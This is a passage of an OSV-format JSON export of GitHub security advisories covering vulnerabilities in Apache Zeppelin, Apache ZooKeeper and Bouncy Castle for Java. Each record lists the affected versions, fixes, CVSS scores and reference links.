"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rrvf-5w4r-3x7v", "published": "2024-04-09T18:30:22Z", "modified": "2024-10-03T18:26:19.190568Z", "aliases": [ "CVE-2024-31868" ], "summary": "Apache Zeppelin vulnerable to cross-site scripting in the helium module", "details": "Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.\n\nAttackers can modify `helium.json` and perform cross-site scripting attacks on normal users. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.\n\n", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin-interpreter", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin-interpreter" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.8.2" }, { "fixed": "0.11.1" } ] } ], "versions": [ "0.10.0", "0.10.1", "0.11.0", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-rrvf-5w4r-3x7v/GHSA-rrvf-5w4r-3x7v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31868" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/pull/4728" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/commit/83685795e0ec8d3059fd7a3dbcae5c0532b63b79" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread/55mqs673plsxmgnq7fdf2flftpllyf11" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/04/09/11" } ], "database_specific": { "cwe_ids": [ "CWE-116", "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-04-11T20:13:12Z", 
"nvd_published_at": "2024-04-09T16:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2hmj-97jw-28jh", "published": "2025-09-24T12:30:20Z", "modified": "2025-11-05T20:52:30.268611Z", "aliases": [ "BIT-zookeeper-2025-58457", "CVE-2025-58457" ], "related": [ "CGA-g4wh-hpww-wvx9", "CGA-jcj7-w8c7-27p8", "CGA-m88p-r4m6-cfxc" ], "summary": "Apache ZooKeeper: Insufficient Permission Check in AdminServer Snapshot/Restore Commands", "details": "Improper permission checks in the AdminServer allow an authenticated client with insufficient privileges to invoke the `snapshot` and `restore` commands. The intended requirement is authentication and authorization on the root path (`/`) with **ALL** permission for these operations; however, affected versions permit invocation without that level of authorization. 
The primary risk is disclosure of cluster state via snapshots to a lesser-privileged client.\n\n* **Affected:** `org.apache.zookeeper:zookeeper` 3.9.0 through 3.9.3.\n* **Fixed:** 3.9.4 (ZOOKEEPER-4964 “check permissions individually during admin server auth”).\n* **Mitigations:**\n * Disable both commands (`admin.snapshot.enabled`, `admin.restore.enabled`).\n * Disable AdminServer (`admin.enableServer`).\n * Ensure the root ACL is not open; note that ZooKeeper ACLs are not recursive.\n * Upgrade to 3.9.4.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0" }, { "fixed": "3.9.4" } ] } ], "versions": [ "3.9.0", "3.9.1", "3.9.2", "3.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-2hmj-97jw-28jh/GHSA-2hmj-97jw-28jh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58457" }, { "type": "PACKAGE", "url": "https://github.com/apache/zookeeper" }, { "type": "WEB", "url": "https://lists.apache.org/thread/r5yol0kkhx2fzw22pxk1ozwm3oc6yxrx" }, { "type": "WEB", "url": "https://zookeeper.apache.org/doc/current/zookeeperSnapshotAndRestore.html" }, { "type": "WEB", "url": "https://zookeeper.apache.org/doc/r3.9.4/releasenotes.html" }, { "type": "WEB", "url": "https://zookeeper.apache.org/security.html#CVE-2025-58457" }, { "type": "WEB", "url": "http://github.com/apache/zookeeper/commit/71e173fcbcc9deb784081cf867bd045df3c32635" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/09/24/10" } ], "database_specific": { "cwe_ids": [ "CWE-280" ], "github_reviewed": true, "github_reviewed_at": "2025-09-24T19:00:08Z", "nvd_published_at": "2025-09-24T10:15:28Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2hw2-62cp-p9p7", "published": "2019-05-29T18:54:11Z", "modified": "2024-03-14T05:19:59.559879Z", "aliases": [ "CVE-2019-0201" ], "summary": "Access control bypass in Apache ZooKeeper", "details": "An issue is present in Apache ZooKeeper 1.0.0 to 3.4.13 and 3.5.0-alpha to 3.5.4-beta. ZooKeeper's getACL() command doesn't check any permission when it retrieves the ACLs of the requested node and returns all information contained in the ACL Id field as plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by getACL() request for unauthenticated or unprivileged users.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "fixed": "3.4.14" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2", "3.3.3", "3.3.4", "3.3.5", "3.3.6", "3.4.0", "3.4.1", "3.4.10", "3.4.11", "3.4.12", "3.4.13", "3.4.2", "3.4.3", "3.4.4", "3.4.5", "3.4.6", "3.4.7", "3.4.8", "3.4.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-2hw2-62cp-p9p7/GHSA-2hw2-62cp-p9p7.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.5.0" }, { "fixed": "3.5.5" } ] } ], "versions": [ "3.5.1-alpha", "3.5.2-alpha", "3.5.3-beta", "3.5.4-beta" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-2hw2-62cp-p9p7/GHSA-2hw2-62cp-p9p7.json" } } ], "references": [ { "type": "ADVISORY", "url":
"https://nvd.nist.gov/vuln/detail/CVE-2019-0201" }, { "type": "WEB", "url": "https://zookeeper.apache.org/security.html#CVE-2019-0201" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4461" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190619-0001" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Jun/13" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00033.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r40f32125c1d97ad82404cc918171d9e0fcf78e534256674e9da1eb4b@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f6112882e30a31992a79e0a8c31ac179e9d0de7c708de3a9258d4391@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5d9a1cf41a5880557bf680b7321b4ab9a4d206c601ffb15fef6f196a@%3Ccommits.accumulo.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/ZOOKEEPER-1392" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4352" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/108427" } ], "database_specific": { "cwe_ids": [ "CWE-862" ], "github_reviewed": true, "github_reviewed_at": "2019-05-29T18:53:55Z", "nvd_published_at": "2019-05-23T14:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7286-pgfv-vxvh", "published": "2023-10-11T12:30:27Z", "modified": "2025-02-13T19:37:41.243540Z", "aliases": [ "BIT-zookeeper-2023-44981", "CVE-2023-44981" ], "related": [ "CGA-r4gp-jw3v-m8j8" ], "summary": "Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper", "details": "Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper. If SASL Quorum Peer authentication is enabled in ZooKeeper (quorum.auth.enableSasl=true), the authorization is done by verifying that the instance part in SASL authentication ID is listed in zoo.cfg server list. The instance part in SASL auth ID is optional and if it's missing, like 'eve@EXAMPLE.COM', the authorization check will be skipped. As a result an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader, essentially giving it complete read-write access to the data tree. 
Quorum Peer authentication is not enabled by default.\n\nUsers are recommended to upgrade to version 3.9.1, 3.8.3, 3.7.2, which fixes the issue.\n\nAlternately ensure the ensemble election/quorum communication is protected by a firewall as this will mitigate the issue.\n\nSee the documentation for more details on correct cluster administration.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.7.2" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2", "3.3.3", "3.3.4", "3.3.5", "3.3.6", "3.4.0", "3.4.1", "3.4.10", "3.4.11", "3.4.12", "3.4.13", "3.4.14", "3.4.2", "3.4.3", "3.4.4", "3.4.5", "3.4.6", "3.4.7", "3.4.8", "3.4.9", "3.5.0-alpha", "3.5.1-alpha", "3.5.10", "3.5.2-alpha", "3.5.3-beta", "3.5.4-beta", "3.5.5", "3.5.6", "3.5.7", "3.5.8", "3.5.9", "3.6.0", "3.6.1", "3.6.2", "3.6.3", "3.6.4", "3.7.0", "3.7.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-7286-pgfv-vxvh/GHSA-7286-pgfv-vxvh.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.8.0" }, { "fixed": "3.8.3" } ] } ], "versions": [ "3.8.0", "3.8.1", "3.8.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-7286-pgfv-vxvh/GHSA-7286-pgfv-vxvh.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0" }, { "fixed": "3.9.1" } ] } ], "versions": [ "3.9.0" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-7286-pgfv-vxvh/GHSA-7286-pgfv-vxvh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44981" }, { "type": "PACKAGE", "url": "https://github.com/apache/zookeeper" }, { "type": "WEB", "url": "https://lists.apache.org/thread/wf0yrk84dg1942z1o74kd8nycg6pgm5b" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00029.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0007" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5544" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/11/4" } ], "database_specific": { "cwe_ids": [ "CWE-639" ], "github_reviewed": true, "github_reviewed_at": "2023-10-11T20:36:50Z", "nvd_published_at": "2023-10-11T12:15:11Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7cwj-j333-x7f7", "published": "2022-05-13T01:08:23Z", "modified": "2023-11-08T03:59:22.246576Z", "aliases": [ "CVE-2017-5637" ], "summary": "Uncontrolled Resource Consumption in Apache ZooKeeper", "details": "Two four letter word commands \"wchp/wchc\" are CPU intensive and could cause spike of CPU utilization on Apache ZooKeeper server if abused, which leads to the server unable to serve legitimate client requests. 
Apache ZooKeeper thru version 3.4.9 and 3.5.2 suffer from this issue, fixed in 3.4.10, 3.5.3, and later.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.4.0" }, { "fixed": "3.4.10" } ] } ], "versions": [ "3.4.0", "3.4.1", "3.4.2", "3.4.3", "3.4.4", "3.4.5", "3.4.6", "3.4.7", "3.4.8", "3.4.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.4.9", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7cwj-j333-x7f7/GHSA-7cwj-j333-x7f7.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.5.0" }, { "fixed": "3.5.3" } ] } ], "versions": [ "3.5.1-alpha", "3.5.2-alpha", "3.5.3-beta" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.5.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7cwj-j333-x7f7/GHSA-7cwj-j333-x7f7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5637" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2477" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3354" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3355" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/ZOOKEEPER-2693" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/58170aeb7a681d462b7fa31cae81110cbb749d2dc83c5736a0bb8370@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "http://www.debian.org/security/2017/dsa-3871" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/98814" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T16:58:11Z", "nvd_published_at": "2017-10-10T01:30:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ccqf-c5hq-77mp", "published": "2022-05-13T01:05:57Z", "modified": "2023-11-08T04:00:23.872615Z", "aliases": [ "CVE-2018-8012" ], "summary": "Missing Authorization in Apache ZooKeeper", "details": "No authentication/authorization is enforced when a server attempts to join a quorum in Apache ZooKeeper before 3.4.10, and 3.5.0-alpha through 3.5.3-beta. 
As a result an arbitrary end point could join the cluster and begin propagating counterfeit changes to the leader.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.4.10" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2", "3.3.3", "3.3.4", "3.3.5", "3.3.6", "3.4.0", "3.4.1", "3.4.2", "3.4.3", "3.4.4", "3.4.5", "3.4.6", "3.4.7", "3.4.8", "3.4.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.4.9", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-ccqf-c5hq-77mp/GHSA-ccqf-c5hq-77mp.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.5.0-alpha" }, { "fixed": "3.5.4-beta" } ] } ], "versions": [ "3.5.0-alpha", "3.5.1-alpha", "3.5.2-alpha", "3.5.3-beta" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.5.3-beta", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-ccqf-c5hq-77mp/GHSA-ccqf-c5hq-77mp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8012" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c75147028c1c79bdebd4f8fa5db2b77da85de2b05ecc0d54d708b393@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r73daf1fc5d85677d9a854707e1908d14e174b7bbb0c603709c0ab33f@%3Coak-commits.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f0d920805af93033c488af89104e2d682662bacfb8406db865d5e14@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc5bc4ddb0deabf8cfb69378cecee56fcdc76929bea9e6373cb863870@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3a4048e9515d4afea416df907a612ed384a16c57cf99e97ee4a12f2@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4214" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/104253" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1040948" } ], "database_specific": { "cwe_ids": [ "CWE-862" ], "github_reviewed": true, "github_reviewed_at": "2022-06-29T19:03:52Z", "nvd_published_at": "2018-05-21T19:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g93m-8x6h-g5gv", "published": "2024-11-07T12:30:35Z", "modified": "2025-06-30T18:59:23.345066Z", "aliases": [ "BIT-zookeeper-2024-51504", "CVE-2024-51504" ], "summary": "Apache ZooKeeper: Authentication bypass with IP-based authentication in Admin Server", "details": "When using IPAuthenticationProvider in ZooKeeper Admin Server there is a possibility of Authentication Bypass by Spoofing -- this only impacts IP based authentication implemented in ZooKeeper Admin Server. 
Default configuration of client's IP address detection in IPAuthenticationProvider, which uses HTTP request headers, is weak and allows an attacker to bypass authentication via spoofing client's IP address in request headers. Default configuration honors X-Forwarded-For HTTP header to read client's IP address. X-Forwarded-For request header is mainly used by proxy servers to identify the client and can be easily spoofed by an attacker pretending that the request comes from a different IP address. Admin Server commands, such as snapshot and restore arbitrarily can be executed on successful exploitation which could potentially lead to information leakage or service availability issues. Users are recommended to upgrade to version 3.9.3, which fixes this issue.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0" }, { "fixed": "3.9.3" } ] } ], "versions": [ "3.9.0", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-g93m-8x6h-g5gv/GHSA-g93m-8x6h-g5gv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51504" }, { "type": "WEB", "url": "https://github.com/apache/zookeeper/commit/2c2b74c1c11b6531aabb1bf06782e859048d5983" }, { "type": "PACKAGE", "url": "https://github.com/apache/zookeeper" }, { "type": "WEB", "url": "https://lists.apache.org/thread/b3qrmpkto5r6989qr61fw9y2x646kqlh" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/11/06/5" } ], "database_specific": { "cwe_ids": [ "CWE-290" ], "github_reviewed": true, "github_reviewed_at": "2025-06-30T18:49:25Z", "nvd_published_at": "2024-11-07T10:15:08Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N" } ] 
}, { "schema_version": "1.7.3", "id": "GHSA-r978-9m6m-6gm6", "published": "2024-03-15T12:30:37Z", "modified": "2025-07-03T16:14:55.159008Z", "aliases": [ "BIT-zookeeper-2024-23944", "CVE-2024-23944" ], "related": [ "CGA-7x45-jmmj-p4h3", "CGA-h562-6hp9-9x2q", "CGA-mrr6-55fr-72mh", "CGA-rgr4-3vcx-cj8x", "CGA-wvcw-6w45-h72m" ], "summary": "Apache ZooKeeper vulnerable to information disclosure in persistent watchers handling", "details": "Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent which the attacker has already access to. ZooKeeper server doesn't do ACL check when the persistent watcher is triggered and as a consequence, the full path of znodes that a watch event gets triggered upon is exposed to the owner of the watcher. It's important to note that only the path is exposed by this vulnerability, not the data of znode, but since znode path can contain sensitive information like user name or login ID, this issue is potentially critical.\n\nUsers are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.8.0" }, { "fixed": "3.8.4" } ] } ], "versions": [ "3.8.0", "3.8.1", "3.8.2", "3.8.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.8.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-r978-9m6m-6gm6/GHSA-r978-9m6m-6gm6.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0" }, { "fixed": "3.9.2" } ] } ], "versions": [ "3.9.0", "3.9.1" ], 
"database_specific": { "last_known_affected_version_range": "\u003c= 3.9.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-r978-9m6m-6gm6/GHSA-r978-9m6m-6gm6.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.6.0" }, { "last_affected": "3.7.2" } ] } ], "versions": [ "3.6.0", "3.6.1", "3.6.2", "3.6.3", "3.6.4", "3.7.0", "3.7.1", "3.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-r978-9m6m-6gm6/GHSA-r978-9m6m-6gm6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23944" }, { "type": "WEB", "url": "https://github.com/apache/zookeeper/commit/29c7b9462681f47c2ac12e609341cf9f52abac5c" }, { "type": "WEB", "url": "https://github.com/apache/zookeeper/commit/65b91d2d9a56157285c2a86b106e67c26520b01d" }, { "type": "WEB", "url": "https://github.com/apache/zookeeper/commit/daf7cfd04005cff1a4f7cab5ab13d41db88d0cd8" }, { "type": "PACKAGE", "url": "https://github.com/apache/zookeeper" }, { "type": "WEB", "url": "https://lists.apache.org/thread/96s5nqssj03rznz9hv58txdb2k1lr79k" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/14/2" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-862" ], "github_reviewed": true, "github_reviewed_at": "2024-03-15T19:35:37Z", "nvd_published_at": "2024-03-15T11:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4cx2-fc23-5wg6", "published": "2025-08-13T12:31:30Z", "modified": "2025-10-17T14:20:44.810668Z", "aliases": [ "CVE-2025-8916" ], "summary": "Bouncy Castle for Java bcpkix, bcprov, bcpkix-fips on All (API modules) allows Excessive 
Allocation", "details": "Allocation of Resources Without Limits or Throttling vulnerability in Legion of the Bouncy Castle Inc. Bouncy Castle for Java bcpkix, bcprov, bcpkix-fips on All (API modules) allows Excessive Allocation. This vulnerability is associated with program files https://github.Com/bcgit/bc-java/blob/main/pkix/src/main/java/org/bouncycastle/pkix/jcajce/PKIXCertP... https://github.Com/bcgit/bc-java/blob/main/pkix/src/main/java/org/bouncycastle/pkix/jcajce/PKIXCertPathReviewer.java , https://github.Com/bcgit/bc-java/blob/main/prov/src/main/java/org/bouncycastle/x509/PKIXCertPathRevi... https://github.Com/bcgit/bc-java/blob/main/prov/src/main/java/org/bouncycastle/x509/PKIXCertPathReviewer.java .\n\nThis issue affects Bouncy Castle for Java: from BC 1.44 through 1.78, from BCPKIX FIPS 1.0.0 through 1.0.7, from BCPKIX FIPS 2.0.0 through 2.0.7.", "affected": [ { "package": { "name": "org.bouncycastle:bcpkix-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.44" }, { "fixed": "1.79" } ] } ], "versions": [ "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.44" }, { "fixed": "1.79" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77", "1.78", 